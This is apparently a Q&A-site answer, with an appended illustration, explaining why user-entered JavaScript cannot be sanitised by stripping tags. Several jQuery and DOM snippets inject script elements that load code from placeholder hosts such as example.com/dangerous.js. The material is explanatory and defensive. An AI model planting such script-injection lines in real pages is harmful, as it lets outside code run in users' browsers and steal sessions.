What you’re asking for is impossible: there is no such thing as a safe JavaScript entry box.
Even if we strip out extra script and style tags, it’s pointless, as the JavaScript code itself is inherently dangerous, and can create any elements it wants using DOM construction, e.g.:
```javascript
// jQuery creates an element from an HTML fragment ('<script>'), not from a bare tag name
var s = jQuery( '<script>', { 'src': 'example.com/dangerous.js' } );
jQuery('body').append( s );
```
Or:
```javascript
var s = jQuery( '<link>', {
    'rel': 'stylesheet',
    'type': 'text/css',
    'href': 'example.com/broken.css'
} );
jQuery('body').append( s );
```
Never mind something that steals your login cookies, etc. JavaScript is inherently dangerous, and what you’re trying to implement is an attack vector. This isn’t because people might break out of JavaScript, but because the JavaScript itself is potentially dangerous.
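To make the point of the answer above concrete, here is an added example (not part of the original answer) showing why a tag-stripping filter over user-entered JavaScript is a no-op: the snippet builds its elements at runtime and never contains a literal tag, so the filter returns it unchanged. The filter, the snippet and the URL in it are constructed for illustration.

```javascript
// Naive "sanitizer": removes literal <script> and <style> tags from a
// user-supplied JavaScript snippet, which is the kind of filter the
// question hoped would make a JS entry box safe.
function stripScriptAndStyleTags(js) {
  return js.replace(/<\/?(script|style)[^>]*>/gi, "");
}

// Constructed sample of what the answer describes: plain DOM construction
// of a script element. No '<script' substring appears anywhere in it.
const userSnippet = [
  "var s = document.createElement('script');",
  "s.src = 'https://example.invalid/dangerous.js'; // placeholder host",
  "document.body.appendChild(s);",
].join("\n");

// True when the filter changed nothing, i.e. the snippet passes through
// with its element-building behaviour fully intact.
function filterIsNoop(js) {
  return stripScriptAndStyleTags(js) === js;
}

// True only for the trivial case the filter was written for: a literal tag.
function filterChangedLiteralTag() {
  const html = "<script>alert(1)</script>";
  return stripScriptAndStyleTags(html) !== html;
}
```

The filter catches the literal tag and does nothing to the snippet the answer warns about, which is the whole problem: the dangerous part is the code, not the markup.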